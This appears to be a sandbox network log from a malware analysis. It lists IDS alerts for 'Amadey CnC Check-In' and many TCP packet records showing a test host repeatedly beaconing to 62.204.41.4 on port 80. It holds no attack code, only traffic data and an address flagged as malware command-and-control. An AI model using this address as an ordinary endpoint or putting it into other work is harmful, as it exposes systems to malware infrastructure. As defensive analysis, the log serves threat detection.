                                                                    192.168.2.362.204.41.449768802027700 02/08/23-21:31:33.720032TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449964802027700 02/08/23-21:32:29.755518TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449739802027700 02/08/23-21:31:25.862579TCP2027700ET TROJAN Amadey CnC Check-In4973980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449828802027700 02/08/23-21:31:50.782978TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449917802027700 02/08/23-21:32:17.561486TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449894802027700 02/08/23-21:32:09.316597TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.362.204.41.4
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                    Feb 8, 2023 21:31:12.120421886 CET804971262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:12.120543003 CET4971280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:12.121654034 CET4971280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:12.184055090 CET804971262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:12.188114882 CET804971262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:12.188221931 CET4971280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:12.346456051 CET4971280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:12.347336054 CET4971380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:12.407838106 CET804971362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:12.408049107 CET4971380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:12.408818007 CET804971262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:12.408931017 CET4971280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:12.783643007 CET4971380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:12.844141960 CET804971362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:12.846388102 CET804971362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:12.846580982 CET4971380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:13.100778103 CET4971380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:13.123907089 CET4971480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:13.161231041 CET804971362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:13.161451101 CET4971380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:13.184881926 CET804971462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:13.185200930 CET4971480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:13.211258888 CET4971480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:13.272094965 CET804971462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:13.275711060 CET804971462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:13.275922060 CET4971480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:13.453883886 CET4971480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:13.454914093 CET4971580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:13.514705896 CET804971462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:13.514944077 CET4971480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:13.515324116 CET804971562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:13.515463114 CET4971580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:13.538250923 CET4971580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:13.598855019 CET804971562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:13.601097107 CET804971562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:13.601310015 CET4971580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:14.432425022 CET4971580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:14.439291000 CET4971680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:14.493171930 CET804971562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:14.493360043 CET4971580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:14.501666069 CET804971662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:14.502680063 CET4971680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:14.532463074 CET4971680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:14.594921112 CET804971662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:14.598109961 CET804971662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:14.598300934 CET4971680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:14.761326075 CET4971680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:14.762309074 CET4971780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:14.825144053 CET804971662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:14.825248003 CET4971680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:14.825495958 CET804971762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:14.825606108 CET4971780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:14.890075922 CET4971780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:14.953299046 CET804971762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:14.955146074 CET804971762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:14.955367088 CET4971780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:15.756072998 CET4971780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:15.756932974 CET4971880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:15.816636086 CET804971862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:15.817239046 CET4971880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:15.818572044 CET804971762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:15.818722010 CET4971780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:15.921504021 CET4971880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:15.982721090 CET804971862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:15.985985994 CET804971862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:15.986243010 CET4971880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:16.952583075 CET4971880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:16.953574896 CET4971980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.012226105 CET804971862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.012445927 CET4971880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.016125917 CET804971962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.016388893 CET4971980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.030553102 CET4971980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.093353033 CET804971962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.097150087 CET804971962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.097232103 CET4971980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.212811947 CET4971980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.213915110 CET4972080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.275490046 CET804971962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.275537014 CET804972062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.275717020 CET4971980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.275772095 CET4972080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.276374102 CET4972080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.337912083 CET804972062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.340347052 CET804972062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.340517044 CET4972080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.474528074 CET4972080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.475435019 CET4972180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.536005974 CET804972062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.536148071 CET4972080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.538744926 CET804972162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.538960934 CET4972180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.546134949 CET4972180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.609603882 CET804972162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.612584114 CET804972162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.612668037 CET4972180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.735064030 CET4972180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.736180067 CET4972280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.796751022 CET804972262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.797024965 CET4972280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.798223972 CET804972162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.798372984 CET4972180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.801754951 CET4972280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.863056898 CET804972262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.865456104 CET804972262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:17.865629911 CET4972280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.986937046 CET4972280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:17.987904072 CET4972380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:18.047569990 CET804972262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:18.047697067 CET4972280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:21.164277077 CET4972380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.093347073 CET4972480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.156831026 CET804972462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.156980991 CET4972480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.157496929 CET4972480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.222655058 CET804972462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.226195097 CET804972462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.226469040 CET4972480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.340118885 CET4972480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.341201067 CET4972580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.402662039 CET804972562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.402884960 CET804972462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.402965069 CET4972580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.403000116 CET4972480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.403676987 CET4972580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.464895010 CET804972562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.467572927 CET804972562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.467744112 CET4972580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.572757006 CET4972580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.573791027 CET4972680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.634315968 CET804972562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.634390116 CET804972662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.634450912 CET4972580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.634531975 CET4972680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.634931087 CET4972680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.695821047 CET804972662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.698296070 CET804972662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.698539019 CET4972680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.823278904 CET4972680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.824126005 CET4972780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.884345055 CET804972662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.884532928 CET4972680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.886683941 CET804972762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.886841059 CET4972780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.887482882 CET4972780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:22.950131893 CET804972762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.952716112 CET804972762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:22.952877045 CET4972780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.056130886 CET4972780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.062985897 CET4972880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.118807077 CET804972762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.119010925 CET4972780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.124330997 CET804972862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.124584913 CET4972880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.125329971 CET4972880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.186729908 CET804972862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.190443993 CET804972862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.190596104 CET4972880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.306176901 CET4972880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.307130098 CET4972980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.367674112 CET804972862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.367866039 CET4972880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.368496895 CET804972962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.368663073 CET4972980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.382591963 CET4972980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.444082022 CET804972962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.446644068 CET804972962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.446824074 CET4972980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.557022095 CET4972980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.558062077 CET4973080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.618586063 CET804972962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.618676901 CET4972980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.620506048 CET804973062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.620606899 CET4973080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.623023987 CET4973080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.685242891 CET804973062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.688044071 CET804973062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.688385010 CET4973080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.802125931 CET4973080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.803267956 CET4973180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.862581968 CET804973162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.862730026 CET4973180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.864672899 CET804973062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.864769936 CET4973080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.865412951 CET4973180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:23.924748898 CET804973162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.927287102 CET804973162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:23.927413940 CET4973180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.041131020 CET4973180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.042120934 CET4973280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.102052927 CET804973162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:24.102183104 CET4973180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.104661942 CET804973262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:24.104784966 CET4973280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.105231047 CET4973280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.166977882 CET804973262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:24.170511961 CET804973262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:24.170591116 CET4973280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.283631086 CET4973280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.284734011 CET4973380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.345089912 CET804973362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:24.345130920 CET804973262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:24.345232964 CET4973380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.345269918 CET4973280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.349654913 CET4973380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.410310984 CET804973362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:24.413149118 CET804973362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:24.413374901 CET4973380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.525295019 CET4973380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.526150942 CET4973480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:24.585747004 CET804973362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:31.344552040 CET804976162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:31.344654083 CET4976180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:31.447942019 CET4976180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:31.448931932 CET4976280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:31.509468079 CET804976162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:31.510560989 CET804976262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:31.510777950 CET4976180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:31.510850906 CET4976280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:31.524264097 CET4976280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:31.585850000 CET804976262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:31.588319063 CET804976262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:31.588852882 CET4976280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:31.715553045 CET4976280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:31.718816042 CET4976380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:31.777219057 CET804976262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:31.779414892 CET804976362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:31.779618979 CET4976280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:31.779716015 CET4976380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:31.780350924 CET4976380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:31.840838909 CET804976362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:31.843260050 CET804976362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:31.843493938 CET4976380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:31.971265078 CET4976380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:31.972515106 CET4976480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.031944990 CET804976362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:32.032037973 CET4976380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.035126925 CET804976462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:32.035271883 CET4976480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.057321072 CET4976480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.120054007 CET804976462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:32.123912096 CET804976462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:32.124876976 CET4976480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.464730024 CET4976480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.465656996 CET4976580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.527127028 CET804976562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:32.527190924 CET804976462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:32.527388096 CET4976480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.528599977 CET4976580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.555335999 CET4976580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.618304968 CET804976562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:32.620625019 CET804976562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:32.620809078 CET4976580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.901148081 CET4976580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.902014017 CET4976680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.962837934 CET804976562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:32.963016033 CET4976580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.964699030 CET804976662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:32.964894056 CET4976680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:32.973144054 CET4976680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:33.036190033 CET804976662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:33.038276911 CET804976662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:33.038441896 CET4976680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:33.296463013 CET4976680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:33.297441959 CET4976780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:33.358995914 CET804976762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:33.359112024 CET804976662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:33.359230995 CET4976780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:33.359268904 CET4976680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:33.408798933 CET4976780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:33.470415115 CET804976762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:33.474467039 CET804976762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:33.474670887 CET4976780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:33.652014971 CET4976780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:33.653048992 CET4976880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:33.713711023 CET804976762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:33.713905096 CET4976780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:33.715811968 CET804976862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:33.716065884 CET4976880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:33.720031977 CET4976880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:33.782958031 CET804976862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:33.785187006 CET804976862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:33.785417080 CET4976880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:34.549817085 CET4976880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:34.612740993 CET804976862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:34.613019943 CET4976880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:34.647905111 CET4976980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:34.707828999 CET804976962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:34.708056927 CET4976980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:34.756431103 CET4976980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:34.816983938 CET804976962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:34.819967031 CET804976962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:34.820229053 CET4976980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:35.121225119 CET4976980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:35.122170925 CET4977080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:35.181029081 CET804976962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:35.181206942 CET4976980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:35.183806896 CET804977062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:35.184009075 CET4977080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:35.698493004 CET4977080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:35.760099888 CET804977062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:35.764023066 CET804977062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:35.764202118 CET4977080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:35.990583897 CET4977080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:35.991683960 CET4977180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:36.051990032 CET804977162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:36.052175999 CET804977062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:36.052253962 CET4977180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:36.052283049 CET4977080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:36.658549070 CET4977180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:36.718952894 CET804977162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:36.723408937 CET804977162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:36.723572969 CET4977180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:36.951472998 CET4977180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:36.952203035 CET4977280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:37.011845112 CET804977162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:37.011981964 CET4977180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:37.014756918 CET804977262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:37.014906883 CET4977280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:37.016273022 CET4977280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:37.078855991 CET804977262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:37.082278967 CET804977262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:37.082463980 CET4977280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:37.208851099 CET4977280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:37.220601082 CET4977380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:37.271670103 CET804977262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:37.271856070 CET4977280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:31:37.282284975 CET804977362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:31:37.282517910 CET4977380192.168.2.362.204.41.4
